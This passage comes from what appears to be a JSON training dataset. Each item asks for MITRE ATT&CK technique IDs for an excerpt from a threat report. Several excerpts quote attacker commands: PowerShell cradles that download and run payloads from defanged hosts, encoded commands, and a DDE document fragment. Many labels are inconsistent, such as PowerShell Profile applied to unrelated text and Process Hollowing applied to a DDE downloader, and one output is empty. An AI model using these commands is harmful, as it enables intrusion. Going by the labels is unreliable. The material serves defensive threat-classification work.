threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the \u201cCommandLineTemplate.\u201d Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, in this new variant, all the DNS activity is initiated and executed solely from memory \u2013 unlike previous attacks which used PowerShell commands", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PowerShell script executes a compressed first stage PowerShell child process, which then performs a second stage PowerShell process", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker\u2019s server", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim\u2019s system once the PowerShell implant is executed", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line: powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\\\ProgramData\\\\WindowsDefender.ini) The rest of the malicious activities are performed by the PowerShell Script", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShell File Analysis The PowerShell script employs several layers of obfuscation to hide its actual functionality", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 11: PowerShell script is XOR encoded using a single byte key After deobfuscating the contents of the PowerShell Script, we can divide it into three sections", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:powershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQQBHAGsAQQBiAGcAQgAwAEEARQAwAEEAWQBRAEIAdQBBAEcARQBBAFoAdwBCAGwAQQBIAEkAQQBYAFEAQQA2AEEARABvAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBRAHcAQgBsAEEASABJAEEAZABBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEARgBZAEEAWQBRAEIAcwBBAEcAawBBAFoAQQBCAGgAQQBIAF..snip..As you can see, the C2 server responds with a PowerShell command that will run on the system", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon execution in a vulnerable environment, the PowerShell based payload takes over", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PowerShell script is responsible for downloading the final payload from C2 server to execute it", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS)", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities.\u00a0 hUpdateCheckers.ps1 (POWRUNER) The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) \u00a0contains the following formula that Excel will save to the \u201cA0\u201d cell in the worksheet: The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"It will run the newly downloaded PowerShell script by running the following command via cmd /c: wscript.exe \"\"Office365DCOMCheck.vbs\"\" \"\"PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -NoProfile \"\" The payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload\"", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following shows this unused command, which exposed an additional server within Sofacy\u2019s infrastructure would download and execute an encoded PowerShell script from 92.114.92[.]102: C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -Whidden $e=(New-ObjectSystem.Net.webClient).downloadString('hxxp://92.114.92[.]102:80/d');powershell -enc $e # The unused command above appears to be related to previous attacks, specifically attacks that occurred in November 2017 as discussed by McAfee and ESET", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Then, it will launch Dec.exe using PowerShell with the command \u201c cmd.exe /c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized \u201d.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, the script triggered a PowerShell stager", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Following successful infiltration, the malware persists through registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run The command line execution leads to PowerShell code executed from a different registry value .", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C& Cs.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script is used to decode and execute the following payloads:Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.PoohMilk AnalysisThe PoohMilk sample is designed to perform two actions:Create persistence to execute the Freenki sample at the next reboot.Check specific files on the infected machine.The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Figure 6 Example of delivery document The RTF document (8cf3bc2bf\u2026) was very small in size at 264 bytes, which can be seen in its entirety here: {\\rtf1{\\field{\\*\\fldinst DDEAUTO \"\"C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe \"\" \"\"/C", + "output": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Figure 1 Article referenced by decoy document in attack against British government agency \u00a0 The attached document leverages a DDE exploit to ultimately execute the following code:c:\\\\windows\\\\system32\\\\cmd.exe \"\"/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe')Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it\"", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 15: Structure used to send data to server Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It then uses WebDAV to upload to a Box cloud drive.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An example of this decompressed configuration may be seen below: Figure 2 Decompressed Reaver configuration This configuration contains multiple pieces of information, including the following: Network port Sleep timer between network requests Remote Command and Control (C2) Service Name Service Description Service Display Name Hardcoded String", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence: Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK This chain of functions eventually loads a resource named \u2018GSrdofjksrgj\u2019, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The files we recovered indicate they do it by executing a script file, which uses the Sysinternals psexec tool to move laterally by trying to copy it to every machine they can reach:", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following capabilities have been observed in this payload: Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hard Disk Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_DiskDrive \u00a0 The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Motherboard Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_BaseBoard \u00a0 The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ShellTea utilizes a number of techniques to identify if it is running within a virtual environment or is being 